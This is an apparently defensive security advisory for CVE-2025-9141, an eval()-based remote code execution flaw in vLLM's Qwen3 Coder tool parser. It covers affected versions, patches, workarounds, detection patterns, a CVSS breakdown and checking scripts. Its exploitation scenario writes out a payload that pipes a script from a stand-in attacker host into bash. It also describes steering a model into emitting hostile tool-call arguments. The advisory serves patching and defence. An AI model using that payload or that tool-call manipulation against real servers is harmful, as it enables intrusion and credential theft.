If you run vLLM >= 0.10.0 and < 0.10.1.1 with the Qwen3 Coder tool parser and automatic tool calling enabled, any authenticated API user who can get the model to pass crafted code as a tool call argument can execute arbitrary code on your inference server. Upgrade to 0.10.1.1 immediately. As an interim workaround, remove `--enable-auto-tool-choice` and `--tool-call-parser qwen3_coder` from your startup config. Inference servers typically run with broad internal access and hold sensitive credentials, so the post-exploitation blast radius is severe.
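To find deployments where the workaround applies, a startup command can be checked for the two flags named above. The following is a minimal sketch, not a vLLM utility: the function name `uses_vulnerable_parser` and the sample model name `example/model` are hypothetical, and it assumes the startup command is available as a single shell-style string.

```python
import shlex

AUTO_TOOL_FLAG = "--enable-auto-tool-choice"
PARSER_FLAG = "--tool-call-parser"
RISKY_PARSER = "qwen3_coder"


def uses_vulnerable_parser(command_line: str) -> bool:
    """Return True if the command enables auto tool choice AND selects qwen3_coder."""
    args = shlex.split(command_line)
    auto_tool = AUTO_TOOL_FLAG in args
    parser = None
    for i, arg in enumerate(args):
        if arg == PARSER_FLAG and i + 1 < len(args):
            parser = args[i + 1]            # form: --tool-call-parser qwen3_coder
        elif arg.startswith(PARSER_FLAG + "="):
            parser = arg.split("=", 1)[1]   # form: --tool-call-parser=qwen3_coder
    return auto_tool and parser == RISKY_PARSER


if __name__ == "__main__":
    # "example/model" is a placeholder, not a real model identifier.
    cmd = "vllm serve example/model --enable-auto-tool-choice --tool-call-parser qwen3_coder"
    print(uses_vulnerable_parser(cmd))
```

A match only means the risky code path is enabled; whether the node is actually vulnerable still depends on the installed vLLM version.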
What is the risk?
High severity (CVSS 8.8). Exploitability is high: the flaw is reachable over the network, has low attack complexity, and requires only standard API authentication, with no elevated privileges or user interaction. LLM inference servers commonly hold API keys, model weights, and internal network access. vLLM is widely deployed as an inference backbone across enterprise and cloud AI stacks, which broadens exposure significantly.
What systems are affected?
| Package | Ecosystem | Vulnerable Range | Patched |
|---|---|---|---|
| vLLM | pip | >= 0.10.0, < 0.10.1.1 | 0.10.1.1 |
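You are affected if you run a vLLM version in the vulnerable range with tool calling enabled (`--enable-auto-tool-choice`) and the qwen3_coder tool parser selected (`--tool-call-parser qwen3_coder`).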
What should I do?
1. PATCH: Upgrade vllm to >=0.10.1.1 immediately on all inference nodes.
2. WORKAROUND (if patching is delayed): Remove the --enable-auto-tool-choice and --tool-call-parser qwen3_coder flags from all startup configs and restart services.
3. NETWORK: Restrict vLLM API access to trusted internal clients only; never expose inference endpoints to the public internet without strong authentication and IP allowlisting.
4. DETECT: Audit API request logs for tool call parameters containing Python syntax patterns (parentheses, 'import', 'os.', 'subprocess.', '__') as exploitation indicators.
5. VERIFY: Audit all running vLLM versions with 'pip show vllm' across inference nodes.
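The VERIFY step can also be scripted per node. The sketch below compares the installed version against the vulnerable range from the table above (>= 0.10.0, < 0.10.1.1). The helper names `release_tuple` and `is_vulnerable` are hypothetical, and the parsing is deliberately simple: it reads only the leading numeric release segment, so a pre-release or local build such as `0.10.0rc1` is conservatively treated like `0.10.0`.

```python
import re
from importlib import metadata

VULNERABLE_FROM = (0, 10, 0, 0)   # inclusive lower bound: 0.10.0
PATCHED_AT = (0, 10, 1, 1)        # exclusive upper bound: 0.10.1.1


def release_tuple(version: str) -> tuple:
    """Parse the leading numeric release segment, padded to four parts."""
    match = re.match(r"\d+(?:\.\d+)*", version)
    if match is None:
        raise ValueError(f"unrecognized version string: {version!r}")
    parts = [int(p) for p in match.group(0).split(".")][:4]
    return tuple(parts + [0] * (4 - len(parts)))


def is_vulnerable(version: str) -> bool:
    """True if the version falls inside the advisory's vulnerable range."""
    return VULNERABLE_FROM <= release_tuple(version) < PATCHED_AT


if __name__ == "__main__":
    try:
        installed = metadata.version("vllm")
    except metadata.PackageNotFoundError:
        print("vllm is not installed in this environment")
    else:
        status = "VULNERABLE" if is_vulnerable(installed) else "outside the affected range"
        print(f"vllm {installed}: {status}")
```

Run it with the same Python interpreter that launches the inference server, since a node may have several environments with different vLLM versions.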
Frequently Asked Questions
What is CVE-2025-9141?
CVE-2025-9141 is a remote code execution vulnerability in vLLM's Qwen3 Coder tool parser, which uses Python's `eval()` to convert tool call parameters whose type is not defined or recognized. In vLLM >= 0.10.0 and < 0.10.1.1 with `--enable-auto-tool-choice` and `--tool-call-parser qwen3_coder` set, any authenticated API user who can get the model to pass code as a tool call argument can execute it on the inference server. The fix is to upgrade to 0.10.1.1; removing the two flags from the startup config is an interim workaround.
Is CVE-2025-9141 actively exploited?
No confirmed active exploitation of CVE-2025-9141 has been reported, but organizations should still patch proactively.
How to fix CVE-2025-9141?
1. PATCH: Upgrade vllm to >=0.10.1.1 immediately on all inference nodes.
2. WORKAROUND (if patching is delayed): Remove the --enable-auto-tool-choice and --tool-call-parser qwen3_coder flags from all startup configs and restart services.
3. NETWORK: Restrict vLLM API access to trusted internal clients only; never expose inference endpoints to the public internet without strong authentication and IP allowlisting.
4. DETECT: Audit API request logs for tool call parameters containing Python syntax patterns (parentheses, 'import', 'os.', 'subprocess.', '__') as exploitation indicators.
5. VERIFY: Audit all running vLLM versions with 'pip show vllm' across inference nodes.
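The DETECT step can be approximated with a simple substring scan. This sketch assumes the tool call parameters have already been extracted from your logs into a name-to-value mapping; the log format, the function names, and the sample values are all hypothetical. The indicator list is the one given in the step above.

```python
# Indicators from the DETECT step; plain substring matches, so expect false positives.
INDICATORS = ("__", "import", "os.", "subprocess.", "(", ")")


def find_indicators(value: str) -> list:
    """Return the indicators that occur in a single parameter value."""
    return [token for token in INDICATORS if token in value]


def flag_parameters(parameters: dict) -> dict:
    """Map each string-valued parameter name to the indicators found in its value."""
    flagged = {}
    for name, value in parameters.items():
        if isinstance(value, str):
            hits = find_indicators(value)
            if hits:
                flagged[name] = hits
    return flagged


if __name__ == "__main__":
    sample = {
        "city": "Paris",
        "path": "__import__('os').system('id')",
    }
    for name, hits in flag_parameters(sample).items():
        print(f"parameter {name!r} matched indicators: {hits}")
```

Because parentheses and words like "import" appear in legitimate arguments, treat matches as triage leads for manual review, not as proof of exploitation.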
What systems are affected by CVE-2025-9141?
This vulnerability affects the following AI/ML architecture patterns: LLM inference serving, agent frameworks, tool-enabled LLM pipelines, agentic AI platforms, multi-tenant AI API services.
What is the CVSS score for CVE-2025-9141?
CVE-2025-9141 has a CVSS v3.1 base score of 8.8 (HIGH). The EPSS exploitation probability is 4.02%.
What is the AI security impact?
MITRE ATLAS Techniques
- AML.T0010.001: AI Software
- AML.T0040: AI Model Inference API Access
- AML.T0049: Exploit Public-Facing Application
- AML.T0050: Command and Scripting Interpreter
- AML.T0053: AI Agent Tool Invocation
What are the technical details?
Original Advisory
### Summary

An unsafe deserialization vulnerability allows any authenticated user to execute arbitrary code on the server if they are able to get the model to pass the code as an argument to a tool call.

### Details

vLLM's [Qwen3 Coder tool parser](https://github.com/vllm-project/vllm/blob/main/vllm/entrypoints/openai/tool_parsers/qwen3coder_tool_parser.py) contains a code execution path that uses Python's `eval()` function to parse tool call parameters. This occurs during the parameter conversion process when the parser attempts to handle unknown data types.

This code path is reached when:

1. Tool calling is enabled (`--enable-auto-tool-choice`)
2. The qwen3_coder parser is specified (`--tool-call-parser qwen3_coder`)
3. The parameter type is not explicitly defined or recognized

### Impact

Remote Code Execution via Python's `eval()` function.
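To illustrate why an `eval()` fallback is dangerous, the sketch below contrasts it with `ast.literal_eval`, which accepts only Python literals. This is a generic illustration, not the vLLM parser's code and not necessarily how the upstream patch works; the function names are hypothetical, and the "hostile" string is a harmless stand-in that only reads the current working directory.

```python
import ast


def convert_unsafe(raw: str):
    """Anti-pattern: eval() executes whatever expression the string contains."""
    return eval(raw)


def convert_safe(raw: str):
    """Accept Python literals only; otherwise keep the value as a plain string."""
    try:
        return ast.literal_eval(raw)
    except (ValueError, SyntaxError, TypeError, MemoryError, RecursionError):
        return raw


if __name__ == "__main__":
    benign = "[1, 2, 3]"
    hostile = "__import__('os').getcwd()"   # harmless stand-in for an attacker payload

    print(convert_safe(benign))     # parsed into a list
    print(convert_safe(hostile))    # returned unchanged as a string, never executed
    print(convert_unsafe(hostile))  # the expression runs: prints the working directory
```

The design point is that a type-conversion fallback should never be able to call functions; a literal-only parser or an explicit per-type converter keeps untrusted strings as data.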
Exploitation Scenario
An adversary with valid but low-privileged API credentials (a stolen service account, a malicious insider, or a compromised client in a multi-tenant deployment) sends a request to a vLLM endpoint serving Qwen3 Coder with the qwen3_coder tool parser enabled. The request is crafted so that the model emits a tool call containing a parameter whose type is undefined or unrecognized, which sends the parser down its `eval()` fallback path. The adversary arranges for that parameter's value to be a payload such as `__import__('os').system('curl attacker.com/shell.sh | bash')`. The payload executes on the inference server with the privileges of the vLLM process owner, enabling credential theft, internal network pivoting, model weight exfiltration, or persistent backdoor installation.
Weaknesses (CWE)
CWE-502 — Deserialization of Untrusted Data: The product deserializes untrusted data without sufficiently ensuring that the resulting data will be valid.
- [Architecture and Design, Implementation] If available, use the signing/sealing features of the programming language to assure that deserialized data has not been tainted. For example, a hash-based message authentication code (HMAC) could be used to ensure that data has not been modified.
- [Implementation] When deserializing data, populate a new object rather than just deserializing. The result is that the data flows through safe input validation and that the functions are safe.
Source: MITRE CWE corpus.
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
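As a worked check, the 8.8 base score can be recomputed from this vector using the CVSS v3.1 base score equations. The sketch below is a minimal calculator that handles only scope-unchanged (`S:U`) vectors, which is all this CVE needs; the function names are hypothetical.

```python
import math

# CVSS v3.1 metric weights (PR values are the scope-unchanged ones).
WEIGHTS = {
    "AV": {"N": 0.85, "A": 0.62, "L": 0.55, "P": 0.2},
    "AC": {"L": 0.77, "H": 0.44},
    "PR": {"N": 0.85, "L": 0.62, "H": 0.27},
    "UI": {"N": 0.85, "R": 0.62},
    "C": {"H": 0.56, "L": 0.22, "N": 0.0},
    "I": {"H": 0.56, "L": 0.22, "N": 0.0},
    "A": {"H": 0.56, "L": 0.22, "N": 0.0},
}


def roundup(value: float) -> float:
    """Round up to one decimal place, as defined in the CVSS v3.1 specification."""
    scaled = round(value * 100000)
    if scaled % 10000 == 0:
        return scaled / 100000.0
    return (math.floor(scaled / 10000) + 1) / 10.0


def base_score(vector: str) -> float:
    """Compute the base score for a CVSS:3.1 vector with unchanged scope."""
    prefix, *pairs = vector.split("/")
    metrics = dict(pair.split(":") for pair in pairs)
    if prefix != "CVSS:3.1" or metrics.get("S") != "U":
        raise ValueError("this sketch only supports CVSS:3.1 vectors with S:U")
    w = {name: WEIGHTS[name][metrics[name]] for name in WEIGHTS}
    iss = 1 - (1 - w["C"]) * (1 - w["I"]) * (1 - w["A"])
    impact = 6.42 * iss
    exploitability = 8.22 * w["AV"] * w["AC"] * w["PR"] * w["UI"]
    if impact <= 0:
        return 0.0
    return roundup(min(impact + exploitability, 10))


if __name__ == "__main__":
    print(base_score("CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"))  # 8.8
```

Here the impact sub-score is about 5.87 and the exploitability sub-score about 2.84; their sum, roughly 8.71, rounds up to 8.8. The `PR:L` metric is what separates this CVE from the 9.8 scores of unauthenticated RCEs.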
Related Vulnerabilities
| CVE | CVSS | Summary | Relation |
|---|---|---|---|
| CVE-2024-9053 | 9.8 | vllm: RCE via unsafe pickle deserialization in RPC server | Same package: vllm |
| CVE-2024-11041 | 9.8 | vllm: RCE via unsafe pickle deserialization in MessageQueue | Same package: vllm |
| CVE-2026-25960 | 9.8 | vllm: SSRF allows internal network access | Same package: vllm |
| CVE-2025-47277 | 9.8 | vLLM: RCE via exposed TCPStore in distributed inference | Same package: vllm |
| CVE-2025-32444 | 9.8 | vLLM: RCE via pickle deserialization on ZeroMQ | Same package: vllm |